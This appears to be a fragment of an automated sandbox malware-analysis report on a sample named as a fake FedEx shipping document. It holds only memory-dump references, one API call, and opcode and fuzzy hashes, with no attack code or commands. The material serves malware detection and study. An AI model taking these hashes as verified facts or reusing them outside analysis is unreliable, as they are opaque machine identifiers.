• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 06C9C205
Memory Dump Source
• Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
Similarity
• API ID:
• String ID: \
• API String ID: 0-2967466578
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 57a6aefe6474d5b916d40ed98e0547074b593aa0c9989d949601c9b2ddb3e08f
                                                                                        • Instruction ID: f285d7314f0872b6fa657c26ed8975878c838cde81ba167b52175815e6822b39
                                                                                        • Opcode Fuzzy Hash: 57a6aefe6474d5b916d40ed98e0547074b593aa0c9989d949601c9b2ddb3e08f
                                                                                        • Instruction Fuzzy Hash: DF614BB4B003468FDBA4CF68C490669BBF1FB85310F204A6AE88ADB761D735ED45CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 559bafbaa4d29d88ce17f1993607a940df3024bb3da3339f097469631da5e773
                                                                                        • Instruction ID: 74ab01752476fd8360fa156285bd36a803df78bcc4cd17daa997cc935da5fda3
                                                                                        • Opcode Fuzzy Hash: 559bafbaa4d29d88ce17f1993607a940df3024bb3da3339f097469631da5e773
                                                                                        • Instruction Fuzzy Hash: 70F02BB030834B1BEB710719C8043797BE5DB4A324F1B0633E459C7A41D998DC828755
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 04cc5f1c95f7443aa153102d77ac701a7f509d9d4f5a6777d49f66b87b1eabe0
                                                                                        • Instruction ID: bd319662ef04c8e04dce530263af83503c63a32d18bc562452faa9280baa80e8
                                                                                        • Opcode Fuzzy Hash: 04cc5f1c95f7443aa153102d77ac701a7f509d9d4f5a6777d49f66b87b1eabe0
                                                                                        • Instruction Fuzzy Hash: 930126315157868FCB529F74C81055D3FB1AF82300F0546AAE58ADB192EB35C9548BA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ceb7b893dbf5369c2e8f76d7bd6b4ff26324253f97128669193f68d3aac9284
                                                                                        • Instruction ID: 3ce653deafb4f8163dbbc6d6eb81f3dacd089e03e8136debc11cd60a0d04f5cb
                                                                                        • Opcode Fuzzy Hash: 3ceb7b893dbf5369c2e8f76d7bd6b4ff26324253f97128669193f68d3aac9284
                                                                                        • Instruction Fuzzy Hash: 55F0A9B170830A16FB70061DD84833DA6D9D38A724F1A0632E91ACBE81DDD9EC824389
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9e4a4b19cfee910c03f34b16bf52b273cc2d81b4a5b55e4d6ad6ffdc9e413cc6
                                                                                        • Instruction ID: 2e3489e475e0ff64707c5e1ab1994cf855f585cdfb7b84cda86271002aee11d2
                                                                                        • Opcode Fuzzy Hash: 9e4a4b19cfee910c03f34b16bf52b273cc2d81b4a5b55e4d6ad6ffdc9e413cc6
                                                                                        • Instruction Fuzzy Hash: B6E026B170032A8BDF244BA9D444B7A33DDDB0A320F110522E805CB350E943DC9183C4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: af50c57f0164cd6fae312121959a7848c16e017b79284e4692661f7e426c74c0
                                                                                        • Instruction ID: 5d6f1ec177c0f47116b3aa811ceb927cbb5ae7b9b0e5711f49d6403fb16dcd74
                                                                                        • Opcode Fuzzy Hash: af50c57f0164cd6fae312121959a7848c16e017b79284e4692661f7e426c74c0
                                                                                        • Instruction Fuzzy Hash: F9E0C2B170432A8BDF2457A9D594B7A33DDDB09324F120672E906CB351ED87DC9183C5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%